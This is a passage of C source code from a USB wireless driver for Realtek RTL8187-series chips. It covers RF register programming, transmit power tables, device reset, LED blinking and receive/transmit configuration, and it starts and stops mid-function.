1 : 0; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1); DELAY(1); } urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); mask = 0x800; for (i = 0; i < rlen; i++, mask = mask >> 1) { urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_read16_m(sc, URTW_RF_PINS_INPUT, &tmp); value |= ((tmp & URTW_BB_HOST_BANG_CLK) ? mask : 0); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); } urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_EN | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, o2); urtw_write16_m(sc, URTW_RF_PINS_SELECT, o3); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, URTW_RF_PINS_OUTPUT_MAGIC1); if (data != NULL) *data = value; fail: return (error); } static usb_error_t urtw_8225v2_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i; uint8_t *cck_pwrtable; uint8_t cck_pwrlvl_max = 15, ofdm_pwrlvl_max = 25, ofdm_pwrlvl_min = 10; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? cck_pwrlvl_max : cck_pwrlvl; cck_pwrlvl += sc->sc_txpwr_cck_base; cck_pwrlvl = (cck_pwrlvl > 35) ? 35 : cck_pwrlvl; cck_pwrtable = (chan == 14) ? urtw_8225v2_txpwr_cck_ch14 : urtw_8225v2_txpwr_cck; for (i = 0; i < 8; i++) urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwrtable[i]); urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225v2_tx_gain_cck_ofdm[cck_pwrlvl]); usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > (ofdm_pwrlvl_max - ofdm_pwrlvl_min)) ? ofdm_pwrlvl_max : ofdm_pwrlvl + ofdm_pwrlvl_min; ofdm_pwrlvl += sc->sc_txpwr_ofdm_base; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; urtw_8187_write_phy_ofdm(sc, 2, 0x42); urtw_8187_write_phy_ofdm(sc, 5, 0x0); urtw_8187_write_phy_ofdm(sc, 6, 0x40); urtw_8187_write_phy_ofdm(sc, 7, 0x0); urtw_8187_write_phy_ofdm(sc, 8, 0x40); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225v2_tx_gain_cck_ofdm[ofdm_pwrlvl]); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225v2_setgain(struct urtw_softc *sc, int16_t gain) { uint8_t *gainp; usb_error_t error; /* XXX for A? 
*/ gainp = urtw_8225v2_gain_bg; urtw_8187_write_phy_ofdm(sc, 0x0d, gainp[gain * 3]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x1b, gainp[gain * 3 + 1]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x1d, gainp[gain * 3 + 2]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x21, 0x17); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_isv2(struct urtw_softc *sc, int *ret) { uint32_t data; usb_error_t error; *ret = 1; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, URTW_RF_PINS_MAGIC5); urtw_write16_m(sc, URTW_RF_PINS_SELECT, URTW_RF_PINS_MAGIC5); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, URTW_RF_PINS_MAGIC5); usb_pause_mtx(&sc->sc_mtx, 500); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC1); error = urtw_8225_read(sc, URTW_8225_ADDR_8_MAGIC, &data); if (error != 0) goto fail; if (data != URTW_8225_ADDR_8_DATA_MAGIC1) *ret = 0; else { error = urtw_8225_read(sc, URTW_8225_ADDR_9_MAGIC, &data); if (error != 0) goto fail; if (data != URTW_8225_ADDR_9_DATA_MAGIC1) *ret = 0; } urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC2); fail: return (error); } static usb_error_t urtw_8225v2b_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint8_t data8; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; /* * initialize extra registers on 8187 */ urtw_write16_m(sc, URTW_BRSR_8187B, 0xfff); /* retry limit */ urtw_read8_m(sc, URTW_CW_CONF, &data8); data8 |= URTW_CW_CONF_PERPACKET_RETRY; urtw_write8_m(sc, URTW_CW_CONF, data8); /* TX AGC */ urtw_read8_m(sc, URTW_TX_AGC_CTL, &data8); data8 |= URTW_TX_AGC_CTL_PERPACKET_GAIN; urtw_write8_m(sc, URTW_TX_AGC_CTL, data8); /* Auto Rate Fallback Control */ #define URTW_ARFR 0x1e0 urtw_write16_m(sc, URTW_ARFR, 0xfff); urtw_read8_m(sc, URTW_RATE_FALLBACK, &data8); urtw_write8_m(sc, URTW_RATE_FALLBACK, data8 | URTW_RATE_FALLBACK_ENABLE); urtw_read8_m(sc, URTW_MSR, &data8); urtw_write8_m(sc, URTW_MSR, data8 & 0xf3); urtw_read8_m(sc, URTW_MSR, &data8); urtw_write8_m(sc, URTW_MSR, data8 | URTW_MSR_LINK_ENEDCA); urtw_write8_m(sc, URTW_ACM_CONTROL, sc->sc_acmctl); urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 100); #define URTW_FEMR_FOR_8187B 0x1d4 urtw_write16_m(sc, URTW_FEMR_FOR_8187B, 0xffff); /* led type */ urtw_read8_m(sc, URTW_CONFIG1, &data8); data8 = (data8 & 0x3f) | 0x80; urtw_write8_m(sc, URTW_CONFIG1, data8); /* applying MAC address again. 
*/ urtw_write32_m(sc, URTW_MAC0, ((uint32_t *)sc->sc_bssid)[0]); urtw_write16_m(sc, URTW_MAC4, ((uint32_t *)sc->sc_bssid)[1] & 0xffff); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; urtw_write8_m(sc, URTW_WPA_CONFIG, 0); /* * MAC configuration */ for (i = 0; i < N(urtw_8225v2b_rf_part1); i++) urtw_write8_m(sc, urtw_8225v2b_rf_part1[i].reg, urtw_8225v2b_rf_part1[i].val); urtw_write16_m(sc, URTW_TID_AC_MAP, 0xfa50); urtw_write16_m(sc, URTW_INT_MIG, 0x0000); urtw_write32_m(sc, 0x1f0, 0); urtw_write32_m(sc, 0x1f4, 0); urtw_write8_m(sc, 0x1f8, 0); urtw_write32_m(sc, URTW_RF_TIMING, 0x4001); #define URTW_RFSW_CTRL 0x272 urtw_write16_m(sc, URTW_RFSW_CTRL, 0x569a); /* * initialize PHY */ error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data8); urtw_write8_m(sc, URTW_CONFIG3, data8 | URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; /* setup RFE initial timing */ urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, 0x0480); urtw_write16_m(sc, URTW_RF_PINS_SELECT, 0x2488); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x1fff); usb_pause_mtx(&sc->sc_mtx, 1100); for (i = 0; i < N(urtw_8225v2b_rf_part0); i++) { urtw_8225_write(sc, urtw_8225v2b_rf_part0[i].reg, urtw_8225v2b_rf_part0[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_8225_write(sc, 0x00, 0x01b7); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225v2b_rxgain[i]); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_8225_write(sc, URTW_8225_ADDR_3_MAGIC, 0x080); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_5_MAGIC, 0x004); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, 0x0b7); usb_pause_mtx(&sc->sc_mtx, 1); usb_pause_mtx(&sc->sc_mtx, 3000); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, 0xc4d); usb_pause_mtx(&sc->sc_mtx, 2000); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, 0x44d); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, 0x2bf); usb_pause_mtx(&sc->sc_mtx, 1); urtw_write8_m(sc, URTW_TX_GAIN_CCK, 0x03); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, 0x07); urtw_write8_m(sc, URTW_TX_ANTENNA, 0x03); urtw_8187_write_phy_ofdm(sc, 0x80, 0x12); for (i = 0; i < 128; i++) { uint32_t addr, data; data = (urtw_8225z2_agc[i] << 8) | 0x0000008f; addr = ((i + 0x80) << 8) | 0x0000008e; urtw_8187_write_phy_ofdm(sc, data & 0x7f, (data >> 8) & 0xff); urtw_8187_write_phy_ofdm(sc, addr & 0x7f, (addr >> 8) & 0xff); urtw_8187_write_phy_ofdm(sc, 0x0e, 0x00); } urtw_8187_write_phy_ofdm(sc, 0x80, 0x10); for (i = 0; i < N(urtw_8225v2b_rf_part2); i++) urtw_8187_write_phy_ofdm(sc, i, urtw_8225v2b_rf_part2[i].val); urtw_write32_m(sc, URTW_8187B_AC_VO, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_VI, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_BE, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_BK, (7 << 12) | (3 << 8) | 0x1c); urtw_8187_write_phy_ofdm(sc, 0x97, 0x46); urtw_8187_write_phy_ofdm(sc, 0xa4, 0xb6); urtw_8187_write_phy_ofdm(sc, 0x85, 0xfc); urtw_8187_write_phy_cck(sc, 0xc1, 0x88); fail: return (error); #undef N } static usb_error_t urtw_8225v2b_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225v2b_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t 
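/*
 * urtw_8225v2b_set_txpwrlvl: program per-channel TX power for the RTL8225
 * v2 "B" radio.  The CCK and OFDM power indices read from EEPROM are
 * clamped, biased by the per-board base values and mapped through
 * urtw_8225v2_tx_gain_cck_ofdm[]; rev B parts use different offsets and
 * caps than rev D/E, and the CCK waveform table is chosen by power range,
 * with a separate table for channel 14.
 */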
urtw_8225v2b_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i; uint8_t *cck_pwrtable; uint8_t cck_pwrlvl_max = 15; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? ((sc->sc_flags & URTW_RTL8187B_REV_B) ? cck_pwrlvl_max : 22) : (cck_pwrlvl + ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 0 : 7)); cck_pwrlvl += sc->sc_txpwr_cck_base; cck_pwrlvl = (cck_pwrlvl > 35) ? 35 : cck_pwrlvl; cck_pwrtable = (chan == 14) ? urtw_8225v2b_txpwr_cck_ch14 : urtw_8225v2b_txpwr_cck; if (sc->sc_flags & URTW_RTL8187B_REV_B) cck_pwrtable += (cck_pwrlvl <= 6) ? 0 : ((cck_pwrlvl <= 11) ? 8 : 16); else cck_pwrtable += (cck_pwrlvl <= 5) ? 0 : ((cck_pwrlvl <= 11) ? 8 : ((cck_pwrlvl <= 17) ? 16 : 24)); for (i = 0; i < 8; i++) urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwrtable[i]); urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225v2_tx_gain_cck_ofdm[cck_pwrlvl] << 1); usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > 15) ? ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 17 : 25) : (ofdm_pwrlvl + ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 2 : 10)); ofdm_pwrlvl += sc->sc_txpwr_ofdm_base; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225v2_tx_gain_cck_ofdm[ofdm_pwrlvl] << 1); if (sc->sc_flags & URTW_RTL8187B_REV_B) { if (ofdm_pwrlvl <= 11) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x60); urtw_8187_write_phy_ofdm(sc, 0x89, 0x60); } else { urtw_8187_write_phy_ofdm(sc, 0x87, 0x5c); urtw_8187_write_phy_ofdm(sc, 0x89, 0x5c); } } else { if (ofdm_pwrlvl <= 11) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x5c); urtw_8187_write_phy_ofdm(sc, 0x89, 0x5c); } else if (ofdm_pwrlvl <= 17) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x54); urtw_8187_write_phy_ofdm(sc, 0x89, 0x54); } else { urtw_8187_write_phy_ofdm(sc, 0x87, 0x50); urtw_8187_write_phy_ofdm(sc, 0x89, 0x50); } } usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_read8e(struct urtw_softc *sc, int val, uint8_t *data) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, val | 0xfe00); USETW(req.wIndex, 0); USETW(req.wLength, sizeof(uint8_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_write8e(struct urtw_softc *sc, int val, uint8_t data) { struct usb_device_request req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, val | 0xfe00); USETW(req.wIndex, 0); USETW(req.wLength, sizeof(uint8_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_8180_set_anaparam(struct urtw_softc *sc, uint32_t val) { uint8_t data; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); urtw_write32_m(sc, URTW_ANAPARAM, val); urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_8185_set_anaparam2(struct urtw_softc *sc, uint32_t val) { uint8_t data; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); urtw_write32_m(sc, 
URTW_ANAPARAM2, val); urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_intr_enable(struct urtw_softc *sc) { usb_error_t error; urtw_write16_m(sc, URTW_INTR_MASK, 0xffff); fail: return (error); } static usb_error_t urtw_intr_disable(struct urtw_softc *sc) { usb_error_t error; urtw_write16_m(sc, URTW_INTR_MASK, 0); fail: return (error); } static usb_error_t urtw_reset(struct urtw_softc *sc) { uint8_t data; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; error = urtw_intr_disable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_write8e(sc, 0x18, 0x10); if (error != 0) goto fail; error = urtw_write8e(sc, 0x18, 0x11); if (error != 0) goto fail; error = urtw_write8e(sc, 0x18, 0x00); if (error != 0) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); urtw_read8_m(sc, URTW_CMD, &data); data = (data & 0x2) | URTW_CMD_RST; urtw_write8_m(sc, URTW_CMD, data); usb_pause_mtx(&sc->sc_mtx, 100); urtw_read8_m(sc, URTW_CMD, &data); if (data & URTW_CMD_RST) { device_printf(sc->sc_dev, "reset timeout\n"); goto fail; } error = urtw_set_mode(sc, URTW_EPROM_CMD_LOAD); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; fail: return (error); } static usb_error_t urtw_led_ctl(struct urtw_softc *sc, int mode) { usb_error_t error = 0; switch (sc->sc_strategy) { case URTW_SW_LED_MODE0: error = urtw_led_mode0(sc, mode); break; case URTW_SW_LED_MODE1: error = urtw_led_mode1(sc, mode); break; case URTW_SW_LED_MODE2: error = urtw_led_mode2(sc, mode); break; case URTW_SW_LED_MODE3: error = urtw_led_mode3(sc, mode); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED mode %d\n", sc->sc_strategy); error = USB_ERR_INVAL; break; } return (error); } static usb_error_t urtw_led_mode0(struct urtw_softc *sc, int mode) { switch (mode) { case URTW_LED_CTL_POWER_ON: sc->sc_gpio_ledstate = URTW_LED_POWER_ON_BLINK; break; case URTW_LED_CTL_TX: if (sc->sc_gpio_ledinprogress == 1) return (0); sc->sc_gpio_ledstate = URTW_LED_BLINK_NORMAL; sc->sc_gpio_blinktime = 2; break; case URTW_LED_CTL_LINK: sc->sc_gpio_ledstate = URTW_LED_ON; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED mode 0x%x", mode); return (USB_ERR_INVAL); } switch (sc->sc_gpio_ledstate) { case URTW_LED_ON: if (sc->sc_gpio_ledinprogress != 0) break; urtw_led_on(sc, URTW_LED_GPIO); break; case URTW_LED_BLINK_NORMAL: if (sc->sc_gpio_ledinprogress != 0) break; sc->sc_gpio_ledinprogress = 1; sc->sc_gpio_blinkstate = (sc->sc_gpio_ledon != 0) ? 
URTW_LED_OFF : URTW_LED_ON; usb_callout_reset(&sc->sc_led_ch, hz, urtw_led_ch, sc); break; case URTW_LED_POWER_ON_BLINK: urtw_led_on(sc, URTW_LED_GPIO); usb_pause_mtx(&sc->sc_mtx, 100); urtw_led_off(sc, URTW_LED_GPIO); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unknown LED status 0x%x", sc->sc_gpio_ledstate); return (USB_ERR_INVAL); } return (0); } static usb_error_t urtw_led_mode1(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_mode2(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_mode3(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_on(struct urtw_softc *sc, int type) { usb_error_t error; if (type == URTW_LED_GPIO) { switch (sc->sc_gpio_ledpin) { case URTW_LED_PIN_GPIO0: urtw_write8_m(sc, URTW_GPIO, 0x01); urtw_write8_m(sc, URTW_GP_ENABLE, 0x00); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED PIN type 0x%x", sc->sc_gpio_ledpin); error = USB_ERR_INVAL; goto fail; } } else { DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED type 0x%x", type); error = USB_ERR_INVAL; goto fail; } sc->sc_gpio_ledon = 1; fail: return (error); } static usb_error_t urtw_led_off(struct urtw_softc *sc, int type) { usb_error_t error; if (type == URTW_LED_GPIO) { switch (sc->sc_gpio_ledpin) { case URTW_LED_PIN_GPIO0: urtw_write8_m(sc, URTW_GPIO, URTW_GPIO_DATA_MAGIC1); urtw_write8_m(sc, URTW_GP_ENABLE, URTW_GP_ENABLE_DATA_MAGIC1); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED PIN type 0x%x", sc->sc_gpio_ledpin); error = USB_ERR_INVAL; goto fail; } } else { DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED type 0x%x", type); error = USB_ERR_INVAL; goto fail; } sc->sc_gpio_ledon = 0; fail: return (error); } static void urtw_led_ch(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_led_task); } static void urtw_ledtask(void *arg, int pending) { struct urtw_softc *sc = arg; if (sc->sc_strategy != URTW_SW_LED_MODE0) { DPRINTF(sc, URTW_DEBUG_STATE, "could not process a LED strategy 0x%x", sc->sc_strategy); return; } URTW_LOCK(sc); urtw_led_blink(sc); URTW_UNLOCK(sc); } static usb_error_t urtw_led_blink(struct urtw_softc *sc) { uint8_t ing = 0; usb_error_t error; if (sc->sc_gpio_blinkstate == URTW_LED_ON) error = urtw_led_on(sc, URTW_LED_GPIO); else error = urtw_led_off(sc, URTW_LED_GPIO); sc->sc_gpio_blinktime--; if (sc->sc_gpio_blinktime == 0) ing = 1; else { if (sc->sc_gpio_ledstate != URTW_LED_BLINK_NORMAL && sc->sc_gpio_ledstate != URTW_LED_BLINK_SLOWLY && sc->sc_gpio_ledstate != URTW_LED_BLINK_CM3) ing = 1; } if (ing == 1) { if (sc->sc_gpio_ledstate == URTW_LED_ON && sc->sc_gpio_ledon == 0) error = urtw_led_on(sc, URTW_LED_GPIO); else if (sc->sc_gpio_ledstate == URTW_LED_OFF && sc->sc_gpio_ledon == 1) error = urtw_led_off(sc, URTW_LED_GPIO); sc->sc_gpio_blinktime = 0; sc->sc_gpio_ledinprogress = 0; return (0); } sc->sc_gpio_blinkstate = (sc->sc_gpio_blinkstate != URTW_LED_ON) ? URTW_LED_ON : URTW_LED_OFF; switch (sc->sc_gpio_ledstate) { case URTW_LED_BLINK_NORMAL: usb_callout_reset(&sc->sc_led_ch, hz, urtw_led_ch, sc); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unknown LED status 0x%x", sc->sc_gpio_ledstate); return (USB_ERR_INVAL); } return (0); } static usb_error_t urtw_rx_enable(struct urtw_softc *sc) { uint8_t data; usb_error_t error; usbd_transfer_start((sc->sc_flags & URTW_RTL8187B) ? 
sc->sc_xfer[URTW_8187B_BULK_RX] : sc->sc_xfer[URTW_8187L_BULK_RX]); error = urtw_rx_setconf(sc); if (error != 0) goto fail; if ((sc->sc_flags & URTW_RTL8187B) == 0) { urtw_read8_m(sc, URTW_CMD, &data); urtw_write8_m(sc, URTW_CMD, data | URTW_CMD_RX_ENABLE); } fail: return (error); } static usb_error_t urtw_tx_enable(struct urtw_softc *sc) { uint8_t data8; uint32_t data; usb_error_t error; if (sc->sc_flags & URTW_RTL8187B) { urtw_read32_m(sc, URTW_TX_CONF, &data); data &= ~URTW_TX_LOOPBACK_MASK; data &= ~(URTW_TX_DPRETRY_MASK | URTW_TX_RTSRETRY_MASK); data &= ~(URTW_TX_NOCRC | URTW_TX_MXDMA_MASK); data &= ~URTW_TX_SWPLCPLEN; data |= URTW_TX_HW_SEQNUM | URTW_TX_DISREQQSIZE | (7 << 8) | /* short retry limit */ (7 << 0) | /* long retry limit */ (7 << 21); /* MAX TX DMA */ urtw_write32_m(sc, URTW_TX_CONF, data); urtw_read8_m(sc, URTW_MSR, &data8); data8 |= URTW_MSR_LINK_ENEDCA; urtw_write8_m(sc, URTW_MSR, data8); return (error); } urtw_read8_m(sc, URTW_CW_CONF, &data8); data8 &= ~(URTW_CW_CONF_PERPACKET_CW | URTW_CW_CONF_PERPACKET_RETRY); urtw_write8_m(sc, URTW_CW_CONF, data8); urtw_read8_m(sc, URTW_TX_AGC_CTL, &data8); data8 &= ~URTW_TX_AGC_CTL_PERPACKET_GAIN; data8 &= ~URTW_TX_AGC_CTL_PERPACKET_ANTSEL; data8 &= ~URTW_TX_AGC_CTL_FEEDBACK_ANT; urtw_write8_m(sc, URTW_TX_AGC_CTL, data8); urtw_read32_m(sc, URTW_TX_CONF, &data); data &= ~URTW_TX_LOOPBACK_MASK; data |= URTW_TX_LOOPBACK_NONE; data &= ~(URTW_TX_DPRETRY_MASK | URTW_TX_RTSRETRY_MASK); data |= sc->sc_tx_retry << URTW_TX_DPRETRY_SHIFT; data |= sc->sc_rts_retry << URTW_TX_RTSRETRY_SHIFT; data &= ~(URTW_TX_NOCRC | URTW_TX_MXDMA_MASK); data |= URTW_TX_MXDMA_2048 | URTW_TX_CWMIN | URTW_TX_DISCW; data &= ~URTW_TX_SWPLCPLEN; data |= URTW_TX_NOICV; urtw_write32_m(sc, URTW_TX_CONF, data); urtw_read8_m(sc, URTW_CMD, &data8); urtw_write8_m(sc, URTW_CMD, data8 | URTW_CMD_TX_ENABLE); fail: return (error); } static usb_error_t urtw_rx_setconf(struct urtw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t data; usb_error_t error; urtw_read32_m(sc, URTW_RX, &data); data = data &~ URTW_RX_FILTER_MASK; if (sc->sc_flags & URTW_RTL8187B) { data = data | URTW_RX_FILTER_MNG | URTW_RX_FILTER_DATA | URTW_RX_FILTER_MCAST | URTW_RX_FILTER_BCAST | URTW_RX_FILTER_NICMAC | URTW_RX_CHECK_BSSID | URTW_RX_FIFO_THRESHOLD_NONE | URTW_MAX_RX_DMA_2048 | URTW_RX_AUTORESETPHY | URTW_RCR_ONLYERLPKT; } else { data = data | URTW_RX_FILTER_MNG | URTW_RX_FILTER_DATA; data = data | URTW_RX_FILTER_BCAST | URTW_RX_FILTER_MCAST; if (ic->ic_opmode == IEEE80211_M_MONITOR) { data = data | URTW_RX_FILTER_ICVERR; data = data | URTW_RX_FILTER_PWR; } if (sc->sc_crcmon == 1 && ic->ic_opmode == IEEE80211_M_MONITOR) data = data | URTW_RX_FILTER_CRCERR; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) { data = data | URTW_RX_FILTER_ALLMAC; } else { data = data | URTW_RX_FILTER_NICMAC; data = data | URTW_RX_CHECK_BSSID; } data = data &~ URTW_RX_FIFO_THRESHOLD_MASK; data = data | URTW_RX_FIFO_THRESHOLD_NONE | URTW_RX_AUTORESETPHY; data = data &~ URTW_MAX_RX_DMA_MASK; data = data | URTW_MAX_RX_DMA_2048 | URTW_RCR_ONLYERLPKT; } urtw_write32_m(sc, URTW_RX, data); fail: return (error); } static struct mbuf * urtw_rxeof(struct usb_xfer *xfer, struct urtw_data *data, int *rssi_p, int8_t *nf_p) { int actlen, flen, rssi; struct ieee80211_frame *wh; struct mbuf *m, *mnew; struct urtw_softc *sc = data->sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t noise = 0, rate; 
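	/*
	 * RX descriptor layout used below: the chip appends a short
	 * descriptor (struct urtw_8187b_rxhdr or struct urtw_8187l_rxhdr)
	 * to the end of each bulk-in transfer.  The low 12 bits of the
	 * little-endian "flag" word hold the frame length including the
	 * FCS, the RXRATE field holds the hardware rate index, and the
	 * rssi/noise bytes are used as the signal estimates handed to
	 * net80211 (the driver itself marks these fields as uncertain
	 * with XXX).
	 */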
